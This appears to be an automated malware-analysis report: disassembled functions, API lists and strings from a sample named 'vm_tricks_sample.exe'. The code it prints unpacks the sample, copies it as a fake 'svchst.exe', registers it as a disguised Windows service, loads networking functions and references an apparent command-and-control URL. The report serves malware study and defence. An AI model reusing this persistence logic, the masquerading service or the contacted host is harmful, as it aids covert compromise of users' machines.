004145F4 mov eax, dword ptr [ebp+0Ch]
004145F7 push eax
004145F8 call 004145B0h
004145FD add esp, 04h
00414600 mov dword ptr [ebp-04h], eax
00414603 mov ecx, dword ptr [ebp+08h]
00414606 push ecx
00414607 mov edx, dword ptr [ebp-04h]
0041460A push edx
0041460B call 00416005h
00414610 add esp, 08h
00414613 push 00000004h
00414615 push 00000000h
00414617 mov eax, dword ptr [ebp-04h]
0041461A push eax
0041461B call 00414A00h
00414620 mov esp, ebp
00414622 pop ebp
00414623 ret function end
Function 00414200, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindClose.KERNEL32, ref: 00414216
Address Instruction Meta Information
00414200 push ebp xrefs 00413EC5
00414201 mov ebp, esp
00414203 mov eax, dword ptr [ebp+08h]
00414206 push eax
00414207 push 6B5366BEh
0041420C push 7B4842C1h
00414211 call 00415E40h
00414216 call eax FindClose@KERNEL32.DLL (Hidden Import)
00414218 pop ebp
00414219 retn 0004h function end

Analysis Process: vm_tricks_sample.exe PID: 1764 Parent PID: 484

Executed Functions
Function 00429D88, API count: 2, instr count: 107
APIs
    • GetModuleHandleA.KERNEL32, ref: 00406044
    • QueryPerformanceCounter.KERNEL32, ref: 00402A20
    • GetTickCount.KERNEL32, ref: 00402A34
    • SHGetSpecialFolderPathA.SHELL32, ref: 00421CEF
    • GetCommandLineA.KERNEL32, ref: 004029F2
    • OpenSCManagerA.ADVAPI32, ref: 00429AC4
    • CreateServiceA.ADVAPI32, ref: 00429AF5
    • CloseServiceHandle.ADVAPI32, ref: 00429AFD
    • OpenServiceA.ADVAPI32, ref: 00429B39
    • StartServiceA.ADVAPI32, ref: 00429B4D
    • QueryServiceStatus.ADVAPI32, ref: 00429B5C
  • CopyFileA.KERNEL32, ref: 00429EBB
  • StartServiceCtrlDispatcherA.ADVAPI32, ref: 00429F02
Strings
  • Host Generic Process, va: 00429F38
  • Host Generic Process for Win32 Services, va: 00429F74
  • \svchst.exe, va: 00429FB0
  • http://mahaajan.in/dd/diwar.php, va: 0042A000
Address Instruction Meta Information
00429D88 push ebp
00429D89 mov ebp, esp
00429D8B mov ecx, 00000005h
00429D92 push 00000000h Count = 2
00429D94 dec ecx
00429D95 jne 00429D90h
00429D97 push ecx
00429D98 push ebx
00429D99 mov eax, 00429CC0h
00429D9E call 00406038h
00429DA3 xor eax, eax
00429DA5 push ebp
00429DA6 push 00429F22h
00429DAB push dword ptr fs:[eax]
00429DAE mov dword ptr fs:[eax], esp
00429DB1 call 00402A1Ch
00429DB6 mov eax, 0042DA9Ch
00429DBB mov edx, 00429F38h ASCII "Host Generic Process"
00429DC0 call 00404430h
00429DC5 mov eax, 0042DAA0h
00429DCA mov edx, 00429F74h ASCII "Host Generic Process for Win32 Services"
00429DCF call 00404430h
00429DD4 mov eax, 0042DAA4h
00429DD9 mov edx, 00429FB0h ASCII "\svchst.exe"
00429DDE call 00404430h
00429DE3 mov eax, 0042DA88h
00429DE8 mov edx, 0042A000h ASCII "http://mahaajan.in/dd/diwar.php"
00429DED call 00404430h
00429DF2 lea edx, dword ptr [ebp-14h]
00429DF5 mov eax, dword ptr [0042DA9Ch] 00000000
00429DFA call 00429BACh
00429DFF mov edx, dword ptr [ebp-14h]
00429E02 mov eax, 0042DA9Ch
00429E07 call 00404430h
00429E0C lea edx, dword ptr [ebp-18h]
00429E0F mov eax, dword ptr [0042DAA0h] 00000000
00429E14 call 00429BACh
00429E19 mov edx, dword ptr [ebp-18h]
00429E1C mov eax, 0042DAA0h
00429E21 call 00404430h
00429E26 lea edx, dword ptr [ebp-1Ch]
00429E29 mov eax, dword ptr [0042DAA4h] 00961D84
00429E2E call 00429BACh
00429E33 mov edx, dword ptr [ebp-1Ch]
00429E36 mov eax, 0042DAA4h
00429E3B call 00404430h
00429E40 mov eax, dword ptr [0042DA88h] 00000000
00429E45 call 00404878h
00429E4A mov edx, eax
00429E4C lea eax, dword ptr [ebp-24h]
00429E4F call 004045D4h
00429E54 mov eax, dword ptr [ebp-24h]
00429E57 lea edx, dword ptr [ebp-20h]
00429E5A call 00429BACh
00429E5F mov edx, dword ptr [ebp-20h]
00429E62 mov eax, 0042DA88h
00429E67 call 00404430h
00429E6C lea edx, dword ptr [ebp-28h]
00429E6F mov ax, 0024h
00429E73 call 00421CB8h
00429E78 mov edx, dword ptr [ebp-28h]
00429E7B mov eax, 0042DAA8h
00429E80 mov ecx, dword ptr [0042DAA4h] 00961D84
00429E86 call 004046C4h
00429E8B mov eax, dword ptr [0042DAA8h] 00961F30
00429E90 call 00407978h
00429E95 test al, al
00429E97 jne 00429EE4h
00429E99 push FFFFFFFFh
00429E9B mov eax, dword ptr [0042DAA8h] 00961F30
00429EA0 call 00404878h
00429EA5 mov ebx, eax
00429EA7 push ebx
00429EA8 lea edx, dword ptr [ebp-2Ch]
00429EAB xor eax, eax
00429EAD call 004029BCh
00429EB2 mov eax, dword ptr [ebp-2Ch]
00429EB5 call 00404878h
00429EBA push eax
00429EBB call 004060FCh CopyFileA@KERNEL32.DLL (Hidden Import)
00429EC0 mov eax, dword ptr [0042DA9Ch] 00000000
00429EC5 call 00404878h
00429ECA push eax
00429ECB mov eax, ebx
00429ECD pop edx
00429ECE call 00429AB4h
00429ED3 mov eax, dword ptr [0042DA9Ch] 00000000
00429ED8 call 00404878h
00429EDD call 00429B14h
00429EE2 jmp 00429F07h
00429EE4 mov eax, dword ptr [0042DA9Ch] 00000000 xrefs 00429E97
00429EE9 call 00404878h
00429EEE mov dword ptr [0042CA98h], eax
00429EF3 mov dword ptr [0042CA9Ch], 00429A0Ch
00429EFD push 0042CA98h
00429F02 call 00421B7Ch StartServiceCtrlDispatcherA@ADVAPI32.DLL (Hidden Import)
00429F07 xor eax, eax xrefs 00429EE2
00429F09 pop edx
00429F0B pop ecx Count = 2
00429F0C mov dword ptr fs:[eax], edx
00429F0F push 00429F29h
00429F14 lea eax, dword ptr [ebp-2Ch] xrefs 00429F27
00429F17 mov edx, 00000007h
00429F1C call 00404400h
00429F21 ret function end
Function 00401520, API count: 1, instr count: 37
APIs
  • VirtualAlloc.KERNEL32, ref: 0040154F
Address Instruction Meta Information
00401520 push ebx xrefs 00401824
00401521 push esi
00401522 push edi
00401523 mov ebx, edx
00401525 mov esi, eax
00401527 cmp esi, 00100000h
0040152D jnl 00401536h
0040152F mov esi, 00100000h
00401534 jmp 00401542h
00401536 add esi, 0000FFFFh xrefs 0040152D
0040153C and esi, FFFF0000h
00401542 mov dword ptr [ebx+04h], esi xrefs 00401534
00401545 push 00000001h
00401547 push 00002000h
0040154C push esi
0040154D push 00000000h
0040154F call 0040134Ch VirtualAlloc@KERNEL32.DLL (Import)
00401554 mov edi, eax
00401556 mov dword ptr [ebx], edi
00401558 test edi, edi
0040155A je 0040157Fh
0040155C mov edx, ebx
0040155E mov eax, 0042C5E4h
00401563 call 004013D4h
00401568 test al, al
0040156A jne 0040157Fh
0040156C push 00008000h
00401571 push 00000000h
00401573 mov eax, dword ptr [ebx]
00401575 push eax
00401576 call 00401354h
0040157B xor eax, eax
0040157D mov dword ptr [ebx], eax
0040157F pop edi xrefs 0040155A, 0040156A
00401580 pop esi
00401581 pop ebx
00401582 ret function end
Function 00407910, API count: 4, instr count: 37
APIs
  • FindFirstFileA.KERNEL32, ref: 0040792B
  • FindClose.KERNEL32, ref: 00407936
  • FileTimeToLocalFileTime.KERNEL32, ref: 0040794F
  • FileTimeToDosDateTime.KERNEL32, ref: 00407960
Address Instruction Meta Information
00407910 push ebp xrefs 0040797D
00407911 mov ebp, esp
00407913 add esp, FFFFFEB4h
00407919 push ebx
0040791A mov ebx, eax
0040791C lea eax, dword ptr [ebp-0000014Ch]
00407922 push eax
00407923 mov eax, ebx
00407925 call 00404878h
0040792A push eax
0040792B call 00406144h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00407930 cmp eax, FFFFFFFFh
00407933 je 00407969h
00407935 push eax
00407936 call 0040613Ch FindClose@KERNEL32.DLL (Hidden Import)
0040793B test byte ptr [ebp-0000014Ch], 00000010h
00407942 jne 00407969h
00407944 lea eax, dword ptr [ebp-0Ch]
00407947 push eax
00407948 lea eax, dword ptr [ebp-00000138h]
0040794E push eax
0040794F call 00406134h FileTimeToLocalFileTime@KERNEL32.DLL (Hidden Import)
00407954 lea eax, dword ptr [ebp-04h]
00407957 push eax
00407958 lea eax, dword ptr [ebp-02h]
0040795B push eax
0040795C lea eax, dword ptr [ebp-0Ch]
0040795F push eax
00407960 call 0040612Ch FileTimeToDosDateTime@KERNEL32.DLL (Hidden Import)
00407965 test eax, eax
00407967 jne 00407970h
00407969 mov dword ptr [ebp-04h], FFFFFFFFh xrefs 00407933, 00407942
00407970 mov eax, dword ptr [ebp-04h] xrefs 00407967
00407973 pop ebx
00407974 mov esp, ebp
00407976 pop ebp
00407977 ret function end
Function 00429AB4, API count: 3, instr count: 44
APIs
  • OpenSCManagerA.ADVAPI32, ref: 00429AC4
  • CreateServiceA.ADVAPI32, ref: 00429AF5
  • CloseServiceHandle.ADVAPI32, ref: 00429AFD
Address Instruction Meta Information
00429AB4 push ebx xrefs 00429ECE
00429AB5 push esi
00429AB6 push edi
00429AB7 push ebp
00429AB8 mov ebp, edx
00429ABA mov edi, eax
00429ABC xor ebx, ebx
00429ABE push 00000002h
00429AC2 push 00000000h Count = 2
00429AC4 call 00421BC4h OpenSCManagerA@ADVAPI32.DLL (Hidden Import)
00429AC9 mov esi, eax
00429ACB test esi, esi
00429ACD je 00429B0Ch
00429AD7 push 00000000h Count = 5
00429AD9 push edi
00429ADA push 00000001h
00429ADC push 00000002h
00429ADE push 00000110h
00429AE3 push 000F0000h
00429AE8 mov eax, dword ptr [0042DAA0h] 00000000
00429AED call 00404878h
00429AF2 push eax
00429AF3 push ebp
00429AF4 push esi
00429AF5 call 00421BCCh CreateServiceA@ADVAPI32.DLL (Hidden Import)
00429AFA mov ebx, eax
00429AFC push esi
00429AFD call 00421B64h CloseServiceHandle@ADVAPI32.DLL (Hidden Import)
00429B02 test ebx, ebx
00429B04 je 00429B0Ah
00429B06 mov bl, 01h
00429B08 jmp 00429B0Ch
00429B0A xor ebx, ebx xrefs 00429B04
00429B0C mov eax, ebx xrefs 00429ACD, 00429B08
00429B0E pop ebp
00429B0F pop edi
00429B10 pop esi
00429B11 pop ebx
00429B12 ret function end
Function 00404268, API count: 2, instr count: 71
APIs
  • FreeLibrary.KERNEL32, ref: 004042ED
    • GetStdHandle.KERNEL32, ref: 00404215
    • WriteFile.KERNEL32, ref: 0040421B
    • MessageBoxA.USER32, ref: 00404254
  • ExitProcess.KERNEL32, ref: 00404322
Address Instruction Meta Information
00404268 push ebx xrefs 00404345
00404269 push esi
0040426A push edi
0040426B push ebp
0040426C mov ebx, 0042C630h
00404271 mov esi, 0042B000h
00404276 mov edi, 0042C040h
0040427B cmp byte ptr [ebx+28h], 00000000h
0040427F jne 00404297h
00404281 cmp dword ptr [edi], 00000000h
00404284 je 00404297h
00404286 mov edx, dword ptr [edi] xrefs 00404295
00404288 mov eax, edx
0040428A xor edx, edx
0040428C mov dword ptr [edi], edx
0040428E mov ebp, eax
00404290 call ebp
00404292 cmp dword ptr [edi], 00000000h
00404295 jne 00404286h
00404297 cmp dword ptr [0042B004h], 00000000h xrefs 0040427F, 00404284
0040429E je 004042B1h
004042A0 call 00404150h
004042A5 call 004041DCh
004042AA xor eax, eax
004042AC mov dword ptr [0042B004h], eax
004042B1 cmp byte ptr [ebx+28h], 00000002h xrefs 0040429E, 00404336
004042B5 jne 004042C1h
004042B7 cmp dword ptr [esi], 00000000h
004042BA jne 004042C1h
004042BC xor eax, eax
004042BE mov dword ptr [ebx+0Ch], eax
004042C1 call 00404004h xrefs 004042B5, 004042BA
004042C6 cmp byte ptr [ebx+28h], 00000001h
004042CA jbe 004042D1h
004042CC cmp dword ptr [esi], 00000000h
004042CF je 004042F2h
004042D1 mov eax, dword ptr [ebx+10h] xrefs 004042CA
004042D4 test eax, eax
004042D6 je 004042F2h
004042D8 call 00405888h
004042DD mov edx, dword ptr [ebx+10h]
004042E0 mov eax, dword ptr [edx+10h]
004042E3 cmp eax, dword ptr [edx+04h]
004042E6 je 004042F2h
004042E8 test eax, eax
004042EA je 004042F2h
004042EC push eax
004042ED call 00401238h FreeLibrary@KERNEL32.DLL (Hidden Import)
004042F2 call 00403FDCh xrefs 004042D6, 004042CF, 004042E6, 004042EA
004042F7 cmp byte ptr [ebx+28h], 00000001h
004042FB jne 00404300h
004042FD call dword ptr [ebx+24h]
00404300 cmp byte ptr [ebx+28h], 00000000h xrefs 004042FB
00404304 je 0040430Bh
00404306 call 004041ACh
0040430B cmp dword ptr [ebx], 00000000h xrefs 00404304
0040430E jne 00404327h
00404310 cmp dword ptr [0042C024h], 00000000h
00404317 je 0040431Fh
00404319 call dword ptr [0042C024h]
0040431F mov eax, dword ptr [esi] xrefs 00404317
00404321 push eax
00404322 call 00401218h ExitProcess@KERNEL32.DLL (Import)
00404327 mov eax, dword ptr [ebx] xrefs 0040430E
00404329 push esi
0040432A mov esi, eax
0040432C mov edi, ebx
0040432E mov ecx, 0000000Bh
00404333 rep movsd
00404335 pop esi
00404336 jmp 004042B1h
Function 00437BB0, API count: 5, instr count: 164
APIs
  • LoadLibraryA.KERNEL32, ref: 00437CDA
  • GetProcAddress.KERNEL32, ref: 00437CEF
  • ExitProcess.KERNEL32, ref: 00437D00
  • VirtualProtect.KERNEL32, ref: 00437D1D
  • VirtualProtect.KERNEL32, ref: 00437D32
Strings
  • ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) , va: 00426000
Address Instruction Meta Information
00437BB0 pushad
00437BB1 mov esi, 00426000h ASCII "ble; MSIE 6.0; Windows NT 5.1; StumbleUpon.com 1.760; .NET CLR 1.1.4322) "
00437BB6 lea edi, dword ptr [esi-00025000h]
00437BBC mov dword ptr [edi+0002A0C4h], 7D9D6338h
00437BC6 push edi
00437BC7 or ebp, FFFFFFFFh
00437BCA jmp 00437BDAh
00437BD0 mov al, byte ptr [esi] xrefs 00437BE1
00437BD2 inc esi
00437BD3 mov byte ptr [edi], al
00437BD5 inc edi
00437BD6 add ebx, ebx xrefs 00437C85, 00437C6E
00437BD8 jne 00437BE1h
00437BDA mov ebx, dword ptr [esi] xrefs 00437BCA
00437BDC sub esi, FFFFFFFCh
00437BDF adc ebx, ebx
00437BE1 jc 00437BD0h xrefs 00437BD8
00437BE3 mov eax, 00000001h
00437BE8 add ebx, ebx xrefs 00437BF7, 00437C02
00437BEA jne 00437BF3h
00437BEC mov ebx, dword ptr [esi]
00437BEE sub esi, FFFFFFFCh
00437BF1 adc ebx, ebx
00437BF3 adc eax, eax xrefs 00437BEA
00437BF5 add ebx, ebx
00437BF7 jnc 00437BE8h
00437BF9 jne 00437C04h
00437BFB mov ebx, dword ptr [esi]
00437BFD sub esi, FFFFFFFCh
00437C00 adc ebx, ebx
00437C02 jnc 00437BE8h
00437C04 xor ecx, ecx xrefs 00437BF9
00437C06 sub eax, 03h
00437C09 jc 00437C18h
00437C0B shl eax, 08h
00437C0E mov al, byte ptr [esi]
00437C10 inc esi
00437C11 xor eax, FFFFFFFFh
00437C14 je 00437C8Ah
00437C16 mov ebp, eax
00437C18 add ebx, ebx xrefs 00437C09
00437C1A jne 00437C23h
00437C1C mov ebx, dword ptr [esi]
00437C1E sub esi, FFFFFFFCh
00437C21 adc ebx, ebx
00437C23 adc ecx, ecx xrefs 00437C1A
00437C25 add ebx, ebx
00437C27 jne 00437C30h
00437C29 mov ebx, dword ptr [esi]
00437C2B sub esi, FFFFFFFCh
00437C2E adc ebx, ebx
00437C30 adc ecx, ecx xrefs 00437C27
00437C32 jne 00437C54h
00437C34 inc ecx
00437C35 add ebx, ebx xrefs 00437C44, 00437C4F
00437C37 jne 00437C40h
00437C39 mov ebx, dword ptr [esi]
00437C3B sub esi, FFFFFFFCh
00437C3E adc ebx, ebx
00437C40 adc ecx, ecx xrefs 00437C37
00437C42 add ebx, ebx
00437C44 jnc 00437C35h
00437C46 jne 00437C51h
00437C48 mov ebx, dword ptr [esi]
00437C4A sub esi, FFFFFFFCh
00437C4D adc ebx, ebx
00437C4F jnc 00437C35h
00437C51 add ecx, 02h xrefs 00437C46
00437C54 cmp ebp, FFFFF300h xrefs 00437C32
00437C5A adc ecx, 01h
00437C5D lea edx, dword ptr [edi+ebp]
00437C60 cmp ebp, FFFFFFFCh
00437C63 jbe 00437C74h
00437C65 mov al, byte ptr [edx] xrefs 00437C6C
00437C67 inc edx
00437C68 mov byte ptr [edi], al
00437C6A inc edi
00437C6B dec ecx
00437C6C jne 00437C65h
00437C6E jmp 00437BD6h
00437C74 mov eax, dword ptr [edx] xrefs 00437C63, 00437C81
00437C76 add edx, 04h
00437C79 mov dword ptr [edi], eax
00437C7B add edi, 04h
00437C7E sub ecx, 04h
00437C81 jnbe 00437C74h
00437C83 add edi, ecx
00437C85 jmp 00437BD6h
00437C8A pop esi xrefs 00437C14
00437C8B mov edi, esi
00437C8D mov ecx, 000014D0h
00437C92 mov al, byte ptr [edi] xrefs 00437C99, 00437C9E
00437C94 inc edi
00437C95 sub al, E8h
00437C97 cmp al, 01h xrefs 00437CBC
00437C99 jnbe 00437C92h
00437C9B cmp byte ptr [edi], 00000011h
00437C9E jne 00437C92h
00437CA0 mov eax, dword ptr [edi]
00437CA2 mov bl, byte ptr [edi+04h]
00437CA5 shr ax, 0008h
00437CA9 rol eax, 10h
00437CAC xchg ah, al
00437CAE sub eax, edi
00437CB0 sub bl, FFFFFFE8h
00437CB3 add eax, esi
00437CB5 mov dword ptr [edi], eax
00437CB7 add edi, 05h
00437CBA mov al, bl
00437CBC loop 00437C97h
00437CBE lea edi, dword ptr [esi+00035000h]
00437CC4 mov eax, dword ptr [edi] xrefs 00437CE6
00437CC6 or eax, eax
00437CC8 je 00437D06h
00437CCA mov ebx, dword ptr [edi+04h]
00437CCD lea eax, dword ptr [eax+esi+00037218h]
00437CD4 add ebx, esi
00437CD6 push eax
00437CD7 add edi, 08h
00437CDA call dword ptr [esi+00037290h] LoadLibraryA@KERNEL32.DLL (Import)
00437CE0 xchg eax, ebp
00437CE1 mov al, byte ptr [edi] xrefs 00437CFE
00437CE3 inc edi
00437CE4 or al, al
00437CE6 je 00437CC4h
00437CE8 mov ecx, edi
00437CEA push edi
00437CEB dec eax
00437CEC repne scasb
00437CEE push ebp
00437CEF call dword ptr [esi+00037294h] GetProcAddress@KERNEL32.DLL (Import)
00437CF5 or eax, eax
00437CF7 je 00437D00h
00437CF9 mov dword ptr [ebx], eax
00437CFB add ebx, 04h
00437CFE jmp 00437CE1h
00437D00 call dword ptr [esi+000372A4h] ExitProcess@KERNEL32.DLL (Import) xrefs 00437CF7
00437D06 mov ebp, dword ptr [esi+00037298h] VirtualProtect@KERNEL32.DLL (Import) xrefs 00437CC8
00437D0C lea edi, dword ptr [esi-00001000h]
00437D12 mov ebx, 00001000h
00437D17 push eax
00437D18 push esp
00437D19 push 00000004h
00437D1B push ebx
00437D1C push edi
00437D1D call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D1F lea eax, dword ptr [edi+0000021Fh]
00437D25 and byte ptr [eax], 0000007Fh
00437D28 and byte ptr [eax+28h], 0000007Fh
00437D2C pop eax
00437D2D push eax
00437D2E push esp
00437D2F push eax
00437D30 push ebx
00437D31 push edi
00437D32 call ebp VirtualProtect@KERNEL32.DLL (Import)
00437D34 pop eax
00437D35 popad
00437D36 lea eax, dword ptr [esp-80h]
00437D3A push 00000000h xrefs 00437D3E
00437D3C cmp esp, eax
00437D3E jne 00437D3Ah
00437D40 sub esp, FFFFFF80h
00437D43 jmp 00429D88h swap point
Function 004016B4, API count: 0, instr count: 54
Address Instruction Meta Information
004016B4 push ebx xrefs 004017F5, 0040193E
004016B5 push esi
004016B6 push edi
004016B7 push ebp
004016B8 add esp, FFFFFFF4h
004016BB mov dword ptr [esp+04h], ecx
004016BF mov dword ptr [esp], edx
004016C2 mov edx, eax
004016C4 mov ebp, edx
004016C6 and ebp, FFFFF000h
004016CC add edx, dword ptr [esp]
004016CF add edx, 00000FFFh
004016D5 and edx, FFFFF000h
004016DB mov dword ptr [esp+08h], edx
004016DF mov eax, dword ptr [esp+04h]
004016E3 mov dword ptr [eax], ebp
004016E5 mov eax, dword ptr [esp+08h]
004016E9 sub eax, ebp
004016EB mov edx, dword ptr [esp+04h]
004016EF mov dword ptr [edx+04h], eax
004016F2 mov esi, dword ptr [0042C5E4h] 0042C5E4
004016F8 jmp 00401736h
004016FA mov ebx, dword ptr [esi+08h] xrefs 0040173C
004016FD mov edi, dword ptr [esi+0Ch]
00401700 add edi, ebx
00401702 cmp ebp, ebx
00401704 jbe 00401708h
00401706 mov ebx, ebp
00401708 cmp edi, dword ptr [esp+08h] xrefs 00401704
0040170C jbe 00401712h
0040170E mov edi, dword ptr [esp+08h]
00401712 cmp edi, ebx xrefs 0040170C
00401714 jbe 00401734h
00401716 push 00000004h
00401718 push 00001000h
0040171D sub edi, ebx
0040171F push edi
00401720 push ebx
00401721 call 0040134Ch
00401726 test eax, eax
00401728 jne 00401734h
0040172A mov eax, dword ptr [esp+04h]
0040172E xor edx, edx
00401730 mov dword ptr [eax], edx
00401732 jmp 0040173Eh
00401734 mov esi, dword ptr [esi] xrefs 00401714, 00401728
00401736 cmp esi, 0042C5E4h xrefs 004016F8
0040173C jne 004016FAh
0040173E add esp, 0Ch xrefs 00401732
00401741 pop ebp
00401742 pop edi
00401743 pop esi
00401744 pop ebx
00401745 ret function end
Function 00414670, API count: 1, instr count: 285
APIs
  • LoadLibraryA.KERNEL32, ref: 004146EF
Strings
  • WSAIoctl, va: 00414AC8
  • __WSAFDIsSet, va: 00414AD4
  • closesocket, va: 00414AE4
  • ioctlsocket, va: 00414AF0
  • WSAGetLastError, va: 00414AFC
  • WSAStartup, va: 00414B0C
  • WSACleanup, va: 00414B18
  • accept, va: 00414B24
  • bind, va: 00414B2C
  • connect, va: 00414B34
  • getpeername, va: 00414B3C
  • getsockname, va: 00414B48
  • getsockopt, va: 00414B54
  • htonl, va: 00414B60
  • htons, va: 00414B68
  • inet_addr, va: 00414B70
  • inet_ntoa, va: 00414B7C
  • listen, va: 00414B88
  • ntohl, va: 00414B90
  • ntohs, va: 00414B98
  • recv, va: 00414BA0
  • recvfrom, va: 00414BA8
  • select, va: 00414BB4
  • send, va: 00414BBC
  • sendto, va: 00414BC4
  • setsockopt, va: 00414BCC
  • shutdown, va: 00414BD8
  • socket, va: 00414BE4
  • gethostbyaddr, va: 00414BEC
  • gethostbyname, va: 00414BFC
  • getprotobyname, va: 00414C0C
  • getprotobynumber, va: 00414C1C
  • getservbyname, va: 00414C30
  • getservbyport, va: 00414C40
  • gethostname, va: 00414C50
  • getaddrinfo, va: 00414C5C
  • freeaddrinfo, va: 00414C68
  • getnameinfo, va: 00414C78
  • wship6.dll, va: 00414C84
  • ws2_32.dll, va: 00414ABC
Address Instruction Meta Information
00414670 push ebp
00414671 mov ebp, esp
00414673 add esp, FFFFFFF8h
00414676 push ebx
00414677 mov dword ptr [ebp-04h], eax
0041467A mov eax, dword ptr [ebp-04h]
0041467D call 00404868h
00414682 mov ebx, 0042B464h
00414687 xor eax, eax
00414689 push ebp
0041468A push 00414AA2h
0041468F push dword ptr fs:[eax]
00414692 mov dword ptr fs:[eax], esp
00414695 mov byte ptr [ebp-05h], 00000000h
00414699 mov byte ptr [0042C8A8h], 00000000h
004146A0 cmp dword ptr [ebp-04h], 00000000h
004146A4 jne 004146B3h
004146A6 lea eax, dword ptr [ebp-04h]
004146A9 mov edx, 00414ABCh ASCII "ws2_32.dll"
004146AE call 00404474h
004146B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004146A4
004146B8 call 00413914h
004146BD xor eax, eax
004146BF push ebp
004146C0 push 00414A85h
004146C5 push dword ptr fs:[eax]
004146C8 mov dword ptr fs:[eax], esp
004146CB cmp dword ptr [0042B460h], 00000000h
004146D2 jne 00414A5Dh
004146D8 mov byte ptr [0042C8A8h], 00000000h
004146DF mov byte ptr [0042C8A9h], 00000000h
004146E6 mov eax, dword ptr [ebp-04h]
004146E9 call 00404878h
004146EE push eax
004146EF call 00406244h LoadLibraryA@KERNEL32.DLL (Import)
004146F4 mov dword ptr [ebx], eax
004146F6 cmp dword ptr [ebx], 00000000h
004146F9 je 00414A61h
004146FF push 00414AC8h ASCII "WSAIoctl"
00414704 mov eax, dword ptr [ebx]
00414706 push eax
00414707 call 004061D4h
0041470C mov dword ptr [0042B45Ch], eax
00414711 push 00414AD4h ASCII "__WSAFDIsSet"
00414716 mov eax, dword ptr [ebx]
00414718 push eax
00414719 call 004061D4h
0041471E mov dword ptr [0042B458h], eax
00414723 push 00414AE4h ASCII "closesocket"
00414728 mov eax, dword ptr [ebx]
0041472A push eax
0041472B call 004061D4h
00414730 mov dword ptr [0042B438h], eax
00414735 push 00414AF0h ASCII "ioctlsocket"
0041473A mov eax, dword ptr [ebx]
0041473C push eax
0041473D call 004061D4h
00414742 mov dword ptr [0042B418h], eax
00414747 push 00414AFCh ASCII "WSAGetLastError"
0041474C mov eax, dword ptr [ebx]
0041474E push eax
0041474F call 004061D4h
00414754 mov dword ptr [0042B3D0h], eax
00414759 push 00414B0Ch ASCII "WSAStartup"
0041475E mov eax, dword ptr [ebx]
00414760 push eax
00414761 call 004061D4h
00414766 mov dword ptr [0042B3C8h], eax
0041476B push 00414B18h ASCII "WSACleanup"
00414770 mov eax, dword ptr [ebx]
00414772 push eax
00414773 call 004061D4h
00414778 mov dword ptr [0042B3CCh], eax
0041477D push 00414B24h ASCII "accept"
00414782 mov eax, dword ptr [ebx]
00414784 push eax
00414785 call 004061D4h
0041478A mov dword ptr [0042B440h], eax
0041478F push 00414B2Ch ASCII "bind"
00414794 mov eax, dword ptr [ebx]
00414796 push eax
00414797 call 004061D4h
0041479C mov dword ptr [0042B43Ch], eax
004147A1 push 00414B34h ASCII "connect"
004147A6 mov eax, dword ptr [ebx]
004147A8 push eax
004147A9 call 004061D4h
004147AE mov dword ptr [0042B434h], eax
004147B3 push 00414B3Ch ASCII "getpeername"
004147B8 mov eax, dword ptr [ebx]
004147BA push eax
004147BB call 004061D4h
004147C0 mov dword ptr [0042B430h], eax
004147C5 push 00414B48h ASCII "getsockname"
004147CA mov eax, dword ptr [ebx]
004147CC push eax
004147CD call 004061D4h
004147D2 mov dword ptr [0042B42Ch], eax
004147D7 push 00414B54h ASCII "getsockopt"
004147DC mov eax, dword ptr [ebx]
004147DE push eax
004147DF call 004061D4h
004147E4 mov dword ptr [0042B3F8h], eax
004147E9 push 00414B60h ASCII "htonl"
004147EE mov eax, dword ptr [ebx]
004147F0 push eax
004147F1 call 004061D4h
004147F6 mov dword ptr [0042B428h], eax
004147FB push 00414B68h ASCII "htons"
00414800 mov eax, dword ptr [ebx]
00414802 push eax
00414803 call 004061D4h
00414808 mov dword ptr [0042B424h], eax
0041480D push 00414B70h ASCII "inet_addr"
00414812 mov eax, dword ptr [ebx]
00414814 push eax
00414815 call 004061D4h
0041481A mov dword ptr [0042B420h], eax
0041481F push 00414B7Ch ASCII "inet_ntoa"
00414824 mov eax, dword ptr [ebx]
00414826 push eax
00414827 call 004061D4h
0041482C mov dword ptr [0042B41Ch], eax
00414831 push 00414B88h ASCII "listen"
00414836 mov eax, dword ptr [ebx]
00414838 push eax
00414839 call 004061D4h
0041483E mov dword ptr [0042B414h], eax
00414843 push 00414B90h ASCII "ntohl"
00414848 mov eax, dword ptr [ebx]
0041484A push eax
0041484B call 004061D4h
00414850 mov dword ptr [0042B410h], eax
00414855 push 00414B98h ASCII "ntohs"
0041485A mov eax, dword ptr [ebx]
0041485C push eax
0041485D call 004061D4h
00414862 mov dword ptr [0042B40Ch], eax
00414867 push 00414BA0h ASCII "recv"
0041486C mov eax, dword ptr [ebx]
0041486E push eax
0041486F call 004061D4h
00414874 mov dword ptr [0042B404h], eax
00414879 push 00414BA8h ASCII "recvfrom"
0041487E mov eax, dword ptr [ebx]
00414880 push eax
00414881 call 004061D4h
00414886 mov dword ptr [0042B408h], eax
0041488B push 00414BB4h ASCII "select"
00414890 mov eax, dword ptr [ebx]
00414892 push eax
00414893 call 004061D4h
00414898 mov dword ptr [0042B448h], eax
0041489D push 00414BBCh ASCII "send"
004148A2 mov eax, dword ptr [ebx]
004148A4 push eax
004148A5 call 004061D4h
004148AA mov dword ptr [0042B400h], eax
004148AF push 00414BC4h ASCII "sendto"
004148B4 mov eax, dword ptr [ebx]
004148B6 push eax
004148B7 call 004061D4h
004148BC mov dword ptr [0042B3FCh], eax
004148C1 push 00414BCCh ASCII "setsockopt"
004148C6 mov eax, dword ptr [ebx]
004148C8 push eax
004148C9 call 004061D4h
004148CE mov dword ptr [0042B3F4h], eax
004148D3 push 00414BD8h ASCII "shutdown"
004148D8 mov eax, dword ptr [ebx]
004148DA push eax
004148DB call 004061D4h
004148E0 mov dword ptr [0042B3F0h], eax
004148E5 push 00414BE4h ASCII "socket"
004148EA mov eax, dword ptr [ebx]
004148EC push eax
004148ED call 004061D4h
004148F2 mov dword ptr [0042B444h], eax
004148F7 push 00414BECh ASCII "gethostbyaddr"
004148FC mov eax, dword ptr [ebx]
004148FE push eax
004148FF call 004061D4h
00414904 mov dword ptr [0042B3E8h], eax
00414909 push 00414BFCh ASCII "gethostbyname"
0041490E mov eax, dword ptr [ebx]
00414910 push eax
00414911 call 004061D4h
00414916 mov dword ptr [0042B3E4h], eax
0041491B push 00414C0Ch ASCII "getprotobyname"
00414920 mov eax, dword ptr [ebx]
00414922 push eax
00414923 call 004061D4h
